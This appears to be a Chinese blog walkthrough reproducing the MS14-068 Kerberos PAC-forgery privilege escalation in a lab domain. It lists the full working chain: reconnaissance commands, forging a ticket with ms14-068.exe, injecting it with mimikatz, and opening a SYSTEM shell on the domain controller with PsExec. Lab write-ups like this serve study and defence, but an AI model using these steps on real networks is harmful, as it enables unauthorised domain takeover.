MS14-068(域提权)漏洞复现

这里便用到了我们之前所讲到的 PAC 这个东西,PAC 是用来验证 Client 的访问权限的,它会被TGT 里发送给 Client,然后由 Client 发送给 TGS。但也恰恰是这个 PAC 造成了 MS14-068 这个漏洞。
该漏洞是位于 kdcsvc.dll 域控制器的密钥分发中心(KDC)服务中的 Windows 漏洞,它允许经过身份验证的用户在其获得的票证 TGT 中插入任意的 PAC 。普通用户可以通过呈现具有改变了 PAC 的 TGT 来伪造票据获得管理员权限

该漏洞在windows server2012环境的域控中可能会发生报错

环境信息

windows server2008 R2(域控):192.168.197.4
windows 7(成员机):192.168.197.133

查看本地主机信息

使用域内主机域内普通用户登录

net config workstation

MS14-068(域提权)漏洞复现_第1张图片

查看域管主机信息
nltest /dsgetdc:

MS14-068(域提权)漏洞复现_第2张图片

查看本地是否打补丁
systeminfo |find "3011780"

返回空证明没打补丁
image.png

本地访问测试
dir \\WIN-S50F8HMOEBD.dc1.com\c$

image.png

查看用户信息
whoami -user

MS14-068(域提权)漏洞复现_第3张图片

使用ms14-068伪造票据:
ms14-068.exe -u [email protected] -p 123 -s S-1-5-21-3698873215-1888486255-1844816113-1107 -d WIN-S50F8HMOEBD.dc1.com

ms14-068.exe -u 域成员名@域名 -p 域成员密码 -s 域成员 sid -d 域控制器地址
MS14-068(域提权)漏洞复现_第4张图片
生成对应文件
MS14-068(域提权)漏洞复现_第5张图片

使用mimikatz来清除和写入凭证
kerberos::purge			//清除凭证
kerberos::ptc  票据地址

image.png
MS14-068(域提权)漏洞复现_第6张图片

再次链接后不会拒绝

dir \\WIN-S50F8HMOEBD.dc1.com\c$

MS14-068(域提权)漏洞复现_第7张图片

反弹shell
PsExec64.exe /accepteula /s \\WIN-S50F8HMOEBD.dc1.com cmd

系统权限
MS14-068(域提权)漏洞复现_第8张图片
域管IP
MS14-068(域提权)漏洞复现_第9张图片

当域控是windows server2012时

会有以下拦截,不知道是什么情况
MS14-068(域提权)漏洞复现_第10张图片

你可能感兴趣的:(漏洞复现,内网,运维,网络安全)